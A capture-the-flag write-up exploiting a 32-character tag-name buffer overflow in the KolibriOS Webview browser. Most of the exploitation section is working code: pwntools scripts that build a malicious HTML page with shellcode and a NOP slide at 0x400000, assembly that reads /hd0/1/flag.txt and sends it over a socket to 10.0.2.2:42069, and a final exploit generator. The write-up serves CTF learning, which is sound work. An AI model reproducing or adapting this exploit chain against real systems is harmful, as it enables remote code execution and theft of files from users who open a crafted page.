Create Links to other pages, but also local programs (yeah wtf)

##### `` Images

Allows displaying data as image

#### KolibriOS

##### File Structure

```bash
/sys
/sys/3d
/sys/Demos
/sys/Develop
/sys/Develop/Examples
/sys/Drivers
/sys/Fonts
/sys/File Managers
/sys/Games
/sys/Lib
/sys/Media
/sys/Media/Imgf
/sys/Network
/sys/Network/Webview # Executable we need to exploit
/sys/Settings
```

### Webview (Browser)

#### Debugging

**Important Addresses**

* `0x00000000` Base Address (Executed file)
* `0x00002800` Start of Stack
* `0x00003900` Location of our tag structure
* `0x00012b0f` Start of our tag write routine
* ~`0x00400000` User controlled Memory (probably heap) contains our Webpage

### Vulnerability

m4ttm00ny notized that there the browser crashes when a tag over the size of 32 char is specified. Sadly we never really found out where the unsafe source code is located it is probably this:

*programs/cmm/browser/TWB/TWB.c*

```c
void TWebBrowser::ParseHtml(dword _bufpointer, _bufsize){
...
if (ESBYTE[bufpos] == '<') && (is_html) {
if (strchr("!/?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", ESBYTE[bufpos+1])) {
bufpos++;
if (tag.parse(#bufpos, bufpointer + bufsize)) {
...
}
continue;
}
}
...
}

```

*programs/cmm/browser/TWB/parse_tag.h*

```c
...
struct _tag
{
char name[32];
char prior[32];
bool opened;
collection attributes;
collection values;
dword value;
dword number;
bool is();
bool parse();
dword get_next_param();
dword get_value_of();
signed get_number_of();
} tag=0;
...
bool _tag::parse(dword _bufpos, bufend) {
...
// probably this
if (name) strcpy(#prior, #name); else prior = '\0';
...
}
```

We spend some time trying to understand why exactly this causes the code to crash

Looking at memory after the crash shows that memory is filled with our 32 byte tag.

After spending some more time in the debugger EspressoForLife and I concluded that we actually overflow into executed code (This wasn't as obvious as in gdb, because errors make the instruction pointer jump to the start of the page `0x00000000`, not showing an invalid instruction was executed).

### Exploitation

#### Exploiting Overflow

##### Analysis

We create a simple webpage that crashes the browser

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'

def tagger(tag):
return b'<' + tag + b'/>'

with open('exploit.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(cyclic(0x20)))
```

NOTE: Webview has a strong cache setting, therefore cache needs to be cleared before each visit with CTRL+F5

If we now open our program and set a write breakpoint at 0x12b0e (with `bpm w 12b0e`) we can see our write routine and how our overwrite happens


Using `cylic_find('acaa')+4` we see that the overflow starts after 11 chars. We also see that our overwrite routine checks for null bytes with `test al, al`, which is why we need to exclude null chars. We can now rewrite our script to jmp into our tag like this:

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000

def tagger(tag):
return b'<' + tag + b'/>'

gen = cyclic_gen()
exploit = gen.get(0xb)
# don't overwrite lodsb intruction to keep overwrite routine going
exploit += asm('lodsb')
# jmp location doesn't matter because we only write the first byte
exploit += asm('jmp $')
# realine gen.get
gen.get(len(exploit)-0xb)
# make sure our exploit is
exploit += gen.get(0x20 - len(exploit))

print(exploit.hex())
with open('test.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
```


We once again use `cyclic_find('aafa')` to see our first code execution starts at offset 18.

##### Jumping to User controlled memory

Because our controlled code execution starts at offset 18 we only have about 14 bytes of RCE (32-18), which isn't enought to read and extract our flag, that is why we need to jmp into user controlled memory, were we can execute more Instructions.

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000

def tagger(tag):
return b'<' + tag + b'/>'

gen = cyclic_gen()
exploit = gen.get(0xb)
exploit += asm('lodsb')
exploit += asm('jmp $')
# align cyclic
gen.get(len(exploit)-0xb)
# align tag
exploit + = gen.get(0x12)
# 9 byte exploit goes here
exploit += b''
# make sure our exploit is 32 chars long
# align cyclic
gen.get(len(exploit)-0x12)
exploit += gen.get(0x20 - len(exploit))

print(exploit.hex())
with open('test.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
# append a lot of characters
exploithtm.write(cyclic(MAX_LENGTH, alphabet=string.printable.encode()))
```


After allocating a lot of memory through adding a lot of characters (`0x100000`) we can jump through memory in `0x100000` steps to see were our data is written and we find out, that `0x400000` hast allocated our data.

We can use this knowledge to rewrite our exploit to jmp to `0x400000` and place a NOP slide at user controlled memory

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000

def nop(size):
return b'\x90' * size

def tagger(tag):
return b'<' + tag + b'/>'

TAG_LENGTH = 0x20
OVERFLOW_START = 0xb
JMP_CODE = 0x12
gen = cyclic_gen()
exploit = gen.get(OVERFLOW_START)
exploit += asm('lodsb')
exploit += asm('jmp $')
exploit += gen.get(JMP_CODE - len(exploit))
# 14 byte exploit goes here
exploit += asm('xor eax, eax')
exploit += asm('mov al, 0x40')
exploit += asm('shl eax, 0x10')
exploit += asm('jmp eax')
# make sure our exploit is 32 chars long
exploit += gen.get(TAG_LENGTH - len(exploit))

print(exploit.hex())
with open('test.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
# append a lot of NOPs
exploithtm.write(nop(MAX_LENGTH))
```


We can now append our payload to the nop slide and get arbitary code execution

#### Setup Payload

Now we only need to create a payload. Because I didn't want to learn how SYSCALLS work in this Operating system i decided to create a setup script that copies a payload at the into the base address at `0x00000000` which makes it possible to compile payload with fasm.

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000

def nop(size):
return b'\x90' * size

def tagger(tag):
return b'<' + tag + b'/>'

# create exploit
...

# setup payload

# read payload from compiled binary
PAYLOAD_FILE='./test'
ENTRY = 0x24

with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()

# set MOV destination (edi) to base address 0x00000000
setup = asm('xor edi, edi')
# MOV the entire payload to destination
setup += asm(f'mov ecx, {len(payload)}')
# trick we use to set the source to current EIP
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
# Add offset from EIP to start of payload
setup += asm('add esi, 13')
# MOV PAYLOAD to destination
setup += asm('rep movsb')
# jmp to ENTRYPOINT
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
# Combine setup and payload
payload = setup + payload
# Append nopslide
payload = nop(MAX_LENGTH-len(payload)) + payload

print(exploit.hex())
with open('test.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
# append payload
exploithtm.write(payload)
```

We can get the entrypoint either by copying the binary to the kolbri.img and load it into the debugger or read the file header with:

```bash
> head test -c 16 | hexdump -C
00000000 4d 45 4e 55 45 54 30 31 01 00 00 00 24 00 00 00 |MENUET01....$...|
00000010
```

In this case the Entrypoint is `0x24`

And It works:


#### Payload

In order to read and extract the flag we need to understand the kernel, especially syscalls. Even though there isn't any good documentation we are provide a lot of sample programs in the repository. The most interesting ones are:

* *programs/network/telnet/telnet.asm*

a telnet implementation for KolibriOS that can be used for creating a remote connection to our extraction URL

* *programs/network/pasta/pasta.asm*

a tool that sends files or clipboard content to [dpaste.com](http://dpaste.com), this gives us an example on how to read files

we use *programs/network/telnet/telnet.asm* as our template

```assembly
...
; send data routine
thread:
mcall 40, 0

mcall 68, 12, 32768 ; read flag file
test eax, eax
jz .error
mov [file_struct.buf], eax
mov [clipboard_data], eax
mcall 70, file_struct
cmp eax, 6
jne .error
mov [clipboard_data_length], ebx
mov eax, [clipboard_data]

jmp .loop

.error:
mov ecx, 0xc
mov esi, file_error
mov edi, clipboard_data
rep movsb

; send data to Remote
.loop:
mov ebx, [counter]
mov esi, [clipboard_data]
add esi, ebx
add ebx, 2
mov [counter], ebx
mov ax, [esi]
mov [send_data], ax
xor esi, esi
inc esi
test al, al
jz done
inc esi
mcall send, [socketnum], send_data ; send data to remote URL

invoke con_get_flags
jmp .loop
...
socketnum dd ?
buffer_ptr rb BUFFERSIZE+1
file_error db 'Error with file', 0xa, 0, 0
file_done db 'File loaded', 0xa, 0, 0
param db '/hd0/1/flag.txt', 0 ; file to extract
send_data dw ?
counter dd 0
identifier dd 0
clipboard_data dd 0 ; file data ptr
clipboard_data_length dd 0
send_ptr dd ?

hostname db '10.0.2.2:42069', 0 ; extraction URL

file_struct:
dd 0 ; read file
dd 0 ; offset
dd 0 ; reserved
dd 32768 ; max file size
.buf dd 0 ; buffer ptr
db 0
dd param

mem:
```

Now we finalize our generator script and get:

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000

def nop(size):
return b'\x90' * size

def tagger(tag):
return b'<' + tag + b'/>'

# create exploit

# setup payload

# read payload from compiled binary
PAYLOAD_FILE='./programs/payload'
ENTRY = 0x1a1

with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()

# set MOV destination (edi) to base address 0x00000000
setup = asm('xor edi, edi')
# MOV the entire payload to destination
setup += asm(f'mov ecx, {len(payload)}')
# trick we use to set the source to current EIP
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
# Add offset from EIP to start of payload
setup += asm('add esi, 13')
# MOV PAYLOAD to destination
setup += asm('rep movsb')
# jmp to ENTRYPOINT
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
# Combine setup and payload
payload = setup + payload
# Append nopslide
payload = nop(MAX_LENGTH-len(payload)) + payload
payload_wrap = b""

print(exploit.hex())
with open('test.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
# append a lot of characters
exploithtm.write(payload_wrap)
```

And we managed to extract the fake flag!!!


Now we only need to make our website and extract port publicly visible and we WIN!!!

### Final Solution

*exploit_gen.py*

```python
#!/bin/python
from pwn import *

HEADER = b'<html><body>'
MAX_LENGTH=0x100000
ENTRY = 0x1A1
out = []

PAYLOAD_FILE='./programs/payload'
# PAYLOAD_FILE='./test'

with open(PAYLOAD_FILE, 'rb') as test:
payload = test.read()

setup = asm('xor edi, edi')
setup += asm(f'mov ecx, {len(payload)}')
get_eip = asm('call $+5')
print(get_eip.hex(), len(get_eip))
setup += get_eip
setup += asm('pop esi')
setup += asm('add esi, 13')
setup += asm('rep movsb')
setup += asm(f'mov eax, {ENTRY}')
setup += asm(f'jmp eax')
print(7, len(setup), setup.hex())
payload = setup + payload
payload = (b'\x90'*(MAX_LENGTH-len(payload))) + payload

IMG = b''

def nop(size):
return b'\x90' * size

def tagger(tag):
return b'<' + tag + b'/>'

def vtagger(tag):
return tagger(b'a' + tag)

def ctagger(size):
return tagger(cyclic(size))

def otagger(tag):
padding = cyclic(0x1f)
return tagger(padding+tag)

exploit = b'a'
exploit += nop(0xa)
exploit += b'\xac'
exploit += asm('jmp $-0x1d')
exploit += nop(4)
exploit += asm('xor eax, eax', arch='i386')
exploit += asm('mov al, 0x40', arch='i386')
exploit += asm('shl eax, 0x10', arch='i386')
exploit += asm('mov ax, 0x0101', arch='i386')
exploit += asm('jmp eax', arch='i386')
exploit += nop(0x20-len(exploit))
print(exploit.hex())
with open('exploit.htm', 'wb') as exploithtm:
exploithtm.write(HEADER)
exploithtm.write(tagger(exploit))
exploithtm.write(IMG)
```

*payload.asm*